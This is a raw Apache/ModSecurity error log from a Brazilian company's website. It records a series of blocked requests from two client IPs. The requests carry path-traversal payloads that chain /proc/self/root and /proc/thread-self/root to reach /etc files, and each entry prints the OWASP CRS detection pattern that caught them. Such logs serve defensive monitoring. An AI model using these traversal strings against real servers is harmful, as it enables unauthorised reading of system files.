[Fri Mar 20 06:36:06.116489 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.243.128:33742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VBrninkcc-iUj5ApNrQAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:08.443052 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:33758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VCAF0L0L-SsrnPo5WrwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:19.992570 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:37620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VE7ninkcc-iUj5ApNtQAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:21.579605 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:39952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VFV1pVZ5mVmJwsFMfBwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:24.156303 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:39968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VGPXLqtnMIWvjpaKJaAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:25.422931 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:39978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VGfXLqtnMIWvjpaKJagAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:26.805322 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:39982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VGgF0L0L-SsrnPo5WvQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:35.749544 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:39984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VI_qxLDW4GITHUkTUTAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:37.135038 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:35514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VJRCii7xarUs8iHZXbgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:39.305239 2026] [mime_magic:error] [pid 10189:tid 140411666392832] (70014)End of file found: [client 57.141.18.5:37726] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:36:39.404628 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:35526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VJ_HIg5MgXLBnicPojAAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:44.724183 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.241.31:42552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VLDJ3M9BSuKP7CAYHGgAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:36:46.083102 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.241.31:47136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VLrninkcc-iUj5ApNvAAAA5U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:36:48.391244 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.241.31:40748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VL_HIg5MgXLBnicPolQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:36:51.237562 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:40756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VMfqxLDW4GITHUkTUYAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:36:52.590707 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:40758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VNNa6ubjKNq_cu4bB-wAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:36:54.779092 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:56246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VNeoXxyEfFpUF8f9xHwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:56.171904 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:40762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VODJ3M9BSuKP7CAYHKAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:36:58.556073 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:51054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VOjJ3M9BSuKP7CAYHMgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:58.669186 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:48416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VOjJ3M9BSuKP7CAYHMwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:36:59.911420 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:52488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VOwF0L0L-SsrnPo5WxwAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:59.967674 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.241.31:48426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VO_HIg5MgXLBnicPomAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
